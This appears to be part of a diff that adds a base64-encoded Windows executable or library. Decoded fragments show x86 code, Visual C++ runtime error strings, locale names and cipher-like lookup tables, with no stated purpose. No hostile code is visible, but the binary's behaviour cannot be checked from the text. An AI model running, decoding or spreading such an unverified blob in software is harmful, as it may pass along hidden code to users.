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
+w41B/YtMJAQrwcONQfyLTCQEK8HDzMzMzMxXi3wkCOtqLovALovALovAi0wkBFf3wQMAAAB0D4oB
+QYTAdDv3wQMAAAB18YsBuv/+/n4D0IPw/zPCg8EEqQABAYF06ItB/ITAdCOE5HQaqQAA/wB0DqkA
+AAD/dALrzY15/+sNjXn+6wiNef3rA415/ItMJAz3wQMAAAB0GYoRQYTSdGSIF0f3wQMAAAB17usF
+iReDxwS6//7+fosBA9CD8P8zwosRg8EEqQABAYF04YTSdDSE9nQn98IAAP8AdBL3wgAAAP90AuvH
+iReLRCQIX8NmiReLRCQIxkcCAF/DZokXi0QkCF/DiBeLRCQIX8P/JSwhQQDMzMzMzMzMzMzMVYvs
+V1ZTi00QC8kPhNwAAACLdQiLfQyNBQD7QACDeAgAdUu3QbNatiAui8CKJgrkigd0IQrAdB1GRzj8
+cgY43HcCAuY4+HIGONh3AgLGOMR1DUl11zPJOMQPhI4AAAC5/////w+CgwAAAPfZ63+DPeQOQQAA
+fwr/BegOQQBqAOsSi9lqE+iWkv//xwQkAQAAAIvLM8Az25CKBgvAih90IwvbdB9GR1FQU+iy/P//
+i9iDxAToqPz//4PEBFk7w3UJSXXVM8k7w3QJuf////9yAvfZWAvAdQj/DegOQQDrDovZahPoqJL/
+/4PEBIvLi8FbXl/JwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQICBAQHBwgICwsNDQ4OEBATExUVFhYZGRoaHBwfHyAg
+IyMlJSYmKSkqKiwsLy8xMTIyNDQ3Nzg4Ozs9PT4+QEBDQ0VFRkZJSUpKTExPT1FRUlJUVFdXWFhb
+W11dXl5hYWJiZGRnZ2hoa2ttbW5ucHBzc3V1dnZ5eXp6fHx/f4CAg4OFhYaGiYmKioyMj4+RkZKS
+lJSXl5iYm5udnZ6eoaGioqSkp6eoqKurra2urrCws7O1tba2ubm6ury8v7/BwcLCxMTHx8jIy8vN
+zc7O0NDT09XV1tbZ2dra3Nzf3+Dg4+Pl5ebm6enq6uzs7+/x8fLy9PT39/j4+/v9/f7+AAAAABAA
+AAAAAAAgEAAAIAAAAQAQAAEAAAABIBAAASAACAAAEAgAAAAIACAQCAAgAAgBABAIAQAACAEgEAgB
+ICAAAAAwAAAAIAAAIDAAACAgAAEAMAABACAAASAwAAEgIAgAADAIAAAgCAAgMAgAICAIAQAwCAEA
+IAgBIDAIASAAAAgAEAAIAAAACCAQAAggAAAJABAACQAAAAkgEAAJIAAICAAQCAgAAAgIIBAICCAA
+CAkAEAgJAAAICSAQCAkgIAAIADAACAAgAAggMAAIICAACQAwAAkAIAAJIDAACSAgCAgAMAgIACAI
+CCAwCAggIAgJADAICQAgCAkgMAgJIAAAAAAAAAACACAAAAAgAAIAACAAAAAgAgAgIAAAICACBAAA
+AAQAAAIEIAAABCAAAgQAIAAEACACBCAgAAQgIAIABAAAAAQAAgAkAAAAJAACAAQgAAAEIAIAJCAA
+ACQgAgQEAAAEBAACBCQAAAQkAAIEBCAABAQgAgQkIAAEJCACAAAAEAAAABIAIAAQACAAEgAAIBAA
+ACASACAgEAAgIBIEAAAQBAAAEgQgABAEIAASBAAgEAQAIBIEICAQBCAgEgAEABAABAASACQAEAAk
+ABIABCAQAAQgEgAkIBAAJCASBAQAEAQEABIEJAAQBCQAEgQEIBAEBCASBCQgEAQkIBIAAAAAAQAA
+AAAABAABAAQAAAAAAQEAAAEAAAQBAQAEAQIAAAADAAAAAgAEAAMABAACAAABAwAAAQIABAEDAAQB
+AAIAAAECAAAAAgQAAQIEAAACAAEBAgABAAIEAQECBAECAgAAAwIAAAICBAADAgQAAgIAAQMCAAEC
+AgQBAwIEAQAAAAgBAAAIAAAECAEABAgAAAAJAQAACQAABAkBAAQJAgAACAMAAAgCAAQIAwAECAIA
+AAkDAAAJAgAECQMABAkAAgAIAQIACAACBAgBAgQIAAIACQECAAkAAgQJAQIECQICAAgDAgAIAgIE
+CAMCBAgCAgAJAwIACQICBAkDAgQJAAAAAAAAEAAAAQAAAAEQAAgAAAAIABAACAEAAAgBEAAAEAAA
+ABAQAAARAAAAERAACBAAAAgQEAAIEQAACBEQAAAAAAQAABAEAAEABAABEAQIAAAECAAQBAgBAAQI
+ARAEABAABAAQEAQAEQAEABEQBAgQAAQIEBAECBEABAgREAQAAAIAAAASAAABAgAAARIACAACAAgA
+EgAIAQIACAESAAAQAgAAEBIAABECAAAREgAIEAIACBASAAgRAgAIERIAAAACBAAAEgQAAQIEAAES
+BAgAAgQIABIECAECBAgBEgQAEAIEABASBAARAgQAERIECBACBAgQEgQIEQIECBESBAAAAAAAAAAQ
+AAABAAAAARAEAAAABAAAEAQAAQAEAAEQAAAAIAAAADAAAAEgAAABMAQAACAEAAAwBAABIAQAATAA
+ABAAAAAQEAAAEQAAABEQBAAQAAQAEBAEABEABAAREAAAECAAABAwAAARIAAAETAEABAgBAAQMAQA
+ESAEABEwABAAAAAQABAAEAEAABABEAQQAAAEEAAQBBABAAQQARAAEAAgABAAMAAQASAAEAEwBBAA
+IAQQADAEEAEgBBABMAAQEAAAEBAQABARAAAQERAEEBAABBAQEAQQEQAEEBEQABAQIAAQEDAAEBEg
+ABARMAQQECAEEBAwBBARIAQQETAAAAAAAAAACAgAAAAIAAAIAAQAAAAEAAgIBAAACAQACAAAAgAA
+AAIICAACAAgAAggABAIAAAQCCAgEAgAIBAIIAQAAAAEAAAgJAAAACQAACAEEAAABBAAICQQAAAkE
+AAgBAAIAAQACCAkAAgAJAAIIAQQCAAEEAggJBAIACQQCCAAAAAIAAAAKCAAAAggAAAoABAACAAQA
+CggEAAIIBAAKAAACAgAAAgoIAAICCAACCgAEAgIABAIKCAQCAggEAgoBAAACAQAACgkAAAIJAAAK
+AQQAAgEEAAoJBAACCQQACgEAAgIBAAIKCQACAgkAAgoBBAICAQQCCgkEAgIJBAIKAAAAAAABAAAA
+AAgAAAEIAAAAAAEAAQABAAAIAQABCAEQAAAAEAEAABAACAAQAQgAEAAAARABAAEQAAgBEAEIAQAA
+IAAAASAAAAAoAAABKAAAACABAAEgAQAAKAEAASgBEAAgABABIAAQACgAEAEoABAAIAEQASABEAAo
+ARABKAEAAgAAAAMAAAACCAAAAwgAAAIAAQADAAEAAggBAAMIARACAAAQAwAAEAIIABADCAAQAgAB
+EAMAARACCAEQAwgBAAIgAAADIAAAAigAAAMoAAACIAEAAyABAAIoAQADKAEQAiAAEAMgABACKAAQ
+AygAEAIgARADIAEQAigBEAMoAQAAAAAAAAAEAAAEAAAABAQCAAAAAgAABAIABAACAAQEACAAAAAg
+AAQAIAQAACAEBAIgAAACIAAEAiAEAAIgBAQgAAAAIAAABCAABAAgAAQEIgAAACIAAAQiAAQAIgAE
+BCAgAAAgIAAEICAEACAgBAQiIAAAIiAABCIgBAAiIAQEAAgAAAAIAAQACAQAAAgEBAIIAAACCAAE
+AggEAAIIBAQAKAAAACgABAAoBAAAKAQEAigAAAIoAAQCKAQAAigEBCAIAAAgCAAEIAgEACAIBAQi
+CAAAIggABCIIBAAiCAQEICgAACAoAAQgKAQAICgEBCIoAAAiKAAEIigEACIoBAQACAgCAAAIAAIA
+AAICCAgCAAAAAgIICAACAAgAAgAAAgIICAAACAgCAAAIAgIIAAACCAACAAAAAgAAAAACAAgAAAAI
+AAIAAAAACAACAAgIAAIICAIAAAgCAggAAAAIAAICAAAAAAgAAAAICAACAAgCAAgAAAIIAAICAAgC
+AAAAAAAAAAACCAgCAAgAAgIACAAACAgCAAAIAAIIAAAACAACAgAIAgAIAAAACAgAAgAAAgIICAAC
+AAAAAgAAAgAACAICCAgCAAgIAAAACAICCAACAAAAAgIIAAACAAgAAAAAAAAACAAAAAACAggAAgAI
+CAICAAAAAgAIAgAIAAACCAgAEIAQQAAAAAAAgBAAAAAQQBAAAEAQgAAAAIAAQACAEAAAgAAAEAAQ
+QBAAAAAAgABAEAAQAACAEEAAABBAEAAAAAAAEAAQgABAEAAQQACAAAAQgBAAAAAAQAAAAAAQABAA
+EIAAQBCAEAAAgBBAEAAAQAAAAEAAABAAEIAAABCAEEAQABAAAIAQQACAAEAQgBAAEIAQQBAAEAAQ
+AABAAAAAAAAAAEAQgAAAAAAQABAAEEAAgAAAAAAAQBCAEAAQgABAAIAQQACAAAAAAAAAEAAAQBAA
+AAAQgBBAAIAQAAAAEEAQABBAAAAQABCAAAAAgABAEIAAQBAAAAAAABBAAIAQAAEAAAQAAQQEAAEA
+AAEBAAQBAAQAAAAABAEBAAQAAQQAAAEABAAABAAAAAQEAQAAAAEBBAQBAQAAAQAAAAEABAQAAAAA
+AQAEAAABBAQAAQAAAQEAAAEBBAQAAAQAAQAABAEABAQAAQAEAQEEAAAABAQAAQQAAAAAAAAAAAQB
+AQQAAAEEBAABAAABAAAAAAAEAAEBAAABAAQAAAAEBAEBAAQAAAAAAAEEBAABBAABAAQEAQAEAAAA
+AAQBAQQEAQAAAAEBBAABAAAEAAAABAEBBAQAAAQAAAEABAEBAAQAAQQAAAEABAAAAAABAAQEAQEA
+AAEAAAQBAQQAAAEAAAAABAQIEEAAABAAEAgAAAAIEEAQAAAAAAAAQBAIEAAQCABAAAAQQBAIAAAQ
+AAAAEAgQAAAIAAAQCBBAAAAAQAAAAAAQCABAEAAQQAAAEAAACAAAAAAQQAAIEAAQAABAEAAQAAAI
+EAAAAAAAAAgAQAAAEEAQABAAEAgAQBAIEEAQAABAAAgAQBAIEAAAAABAAAgAABAAEEAAABAAEAgA
+AAAAAEAQCBAAEAAAAAAAEAAACABAAAAAAAAIAEAQABBAEAAQAAAAAAAQCBBAEAgQQAAAAEAACBBA
+EAgAAAAAEAAQCBBAAAgAQAAAEEAAAABAEAgQABAIEAAAAAAAEAgAABAAEEAQAAAACAAAAQAABAAA
+IAQBCCAAAQgABAAIIAQBAAAAAQgAAAEAIAAAACAAAAgABAEAIAQACCAAAQgABAEIAAAAAAAEAQAA
+AAAIIAABACAEAAAABAAIIAQBAAAAAAAgAAAIIAAAACAEAAggBAEIIAABAAAAAQgABAAAIAQAAAAE
+AQgABAEIIAQACCAAAQAAAAEIAAABACAAAAAgAAAIAAQACAAAAAgABAEAIAQBCAAAAAAgBAEAAAAA
+CAAEAAAgAAEAIAQACAAEAAAAAAAAIAQBCCAAAQgABAEIIAQAAAAAAQAABAEAIAABCAAEAAggBAAA
+IAAAACAEAQAAAAEIIAAACEAAAIBAACAAAAAAAAAgIIBAACAAACAAAEAgAIAAACAAQCAAAEAgIIAA
+ICAAAAAAgAAgAIBAAACAAAAggEAgIAAAACAAQCAAgEAAIIAAAAAAACAAAEAAAAAAICCAQAAggEAg
+IIAAACCAAAAAgEAgAABAAAAAACAgAEAgIAAAIACAQCAAAAAAAIAAIACAQCAgAAAgIIBAACAAAAAA
+AAAgAIAAAACAACAAAEAAIIAAACAAQAAgAEAgIIAAICAAQAAAAEAgIIAAICAAAAAgAEAgAIBAAACA
+AAAggEAgIAAAAAAAACAAAEAAAIBAIACAACAggAAAIIBAIAAAQAAAAEAAIIAAQAAAAAIAAAACAAEE
+AAABBEIAAQRAAAAAQgAAAAAAAAAAAAEEAgABBAIAAABAAAEEAAAAAEIAAQBAAAEEAgAABAIAAQBA
+AAAEQAAABEIAAQAAAAAAAgABBAAAAQBCAAAEQAABBEIAAABCAAEEAAAABEIAAARAAAEAAgAAAAAA
+AQRCAAAAQAABBEAAAQQCAAAAQAAAAAIAAAAAAAEEQAABBAIAAQRCAAAAQgAAAAAAAAACAAAEAAAB
+BAAAAAACAAEAAAAABAIAAQACAAEAQgAABAIAAABAAAAEQgABAAAAAQBCAAEEAAAABEAAAARCAAEE
+AAABAEIAAQBAAAEEQAAAgACAIAAAgiCAAAIAAAAAAAAAAiCAAIAAAACAIIAAgiCAAAAAAAAAIAAA
+ggCAAAIAgACCAIAAAiCAAAAgAACAIAAAAgCAAIIAgACAAAAAAiCAAIIggAAAIAAAAAAAAIIAAAAA
+IAAAgACAAAIggACAIAAAgAAAAAIAAACCIIAAAAAAAIAAAAACAIAAACCAAIIggAACAAAAACAAAAAA
+AACCAIAAgCCAAAIgAAACIIAAgAAAAIIggAAAAIAAgAAAAAIggACCIAAAgAAAAIAggAAAIAAAggCA
+AAIAgAACIAAAgCCAAAAAAACCIIAAggAAAAAAAAAAIIAAgCAAAAIAgACCAHDsQACwPUAAY3Nt4AEA
+AAAAAAAAAAAAAAMAAAAgBZMZAAAAAAAAAAD/////4lJAAP1SQAAAAAAA//////5fQAALYEAAAAAA
+AP////8AAAAA3WFAAAAAAAC2YUAAw2FAAP////85ZEAAP2RAAAAAAAD/////qmRAALJkQABMQ19U
+SU1FAExDX05VTUVSSUMAAExDX01PTkVUQVJZAExDX0NUWVBFAAAAAExDX0NPTExBVEUAAExDX0FM
+TAAALgAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAAYAAAYAAQAAEAADBgAGAhAERUVFBQUFBQU1
+MABQAAAAACAoOFBYBwgANzAwV1AHAAAgIAgAAAAACGBgYGBgYAAAcHB4eHh4CAcIAAAHAAgICAAA
+CAAIAAAIAAAAcnVudGltZSBlcnJvciAAAA0KAABUTE9TUyBlcnJvcg0KAAAAU0lORyBlcnJvcg0K
+AAAAAERPTUFJTiBlcnJvcg0KAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb3dpbyBp
+bml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIHN0ZGlvIGlu
+aXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9uIGNhbGwNCgAA
+AFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRhYmxlDQoAAAAA
+UjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAxOA0KLSB1bmV4
+cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRpdGhyZWFkIGxv
+Y2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJlYWQgZGF0YQ0K
+AA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5vdCBlbm91Z2gg
+c3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgYXJn
+dW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoAAAAATWljcm9z
+b2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVycm9yIQoKUHJv
+Z3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAD/////AAAAAIWOQAAAAAAA
+WY5AAF+OQAD/////AAAAAP2OQAAAAAAA0Y5AANeOQAB1bml0ZWQtc3RhdGVzAAAAdW5pdGVkLWtp
+bmdkb20AAHVuaXRlZCBzdGF0ZXMAAAB1bml0ZWQga2luZ2RvbQAAdHduAHR1cmtleQAAdHVyAHRh
